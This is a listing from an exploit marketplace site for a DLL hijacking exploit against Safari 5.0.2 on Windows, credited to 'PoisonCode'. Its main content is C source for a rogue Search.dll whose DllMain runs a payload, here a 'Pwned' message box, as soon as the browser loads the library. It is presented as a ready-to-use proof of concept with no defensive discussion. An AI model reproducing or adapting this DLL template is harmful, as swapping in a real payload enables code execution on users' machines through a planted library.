[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Safari Browser 5.0.2 DLL Hijacking Exploit (Search.dll)

Author
PoisonCode
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14911
Category
local exploits
Date add
20-11-2010
Platform
windows
=======================================================
Safari Browser 5.0.2 DLL Hijacking Exploit (Search.dll)
=======================================================

# Title:Safari Browser 5.0.2 DLL Hijacking Exploit(Search.dll)
# Software:http://www.apple.com/es/safari/download/
# Version: 5.0.2
# Tested on: Windows
# Author: PoisonCode
# Email:  PanamaSecurity@hotmail.com
# Published: 2010-11-19
# CVE-ID:()
  
_____    _____                      _ _       
|  __ \ / ____|                    (_) |      
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/


#include <windows.h>
#define DllExport __declspec (dllexport)
int PS()
{
  MessageBox(0, "Pwned by PoisonCode-PanamaSecurity", "PSecurity", MB_OK);
  return 0;
}
BOOL WINAPI  DllMain (
			HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
			{
	PS();}



#  0day.today [2024-11-14]  #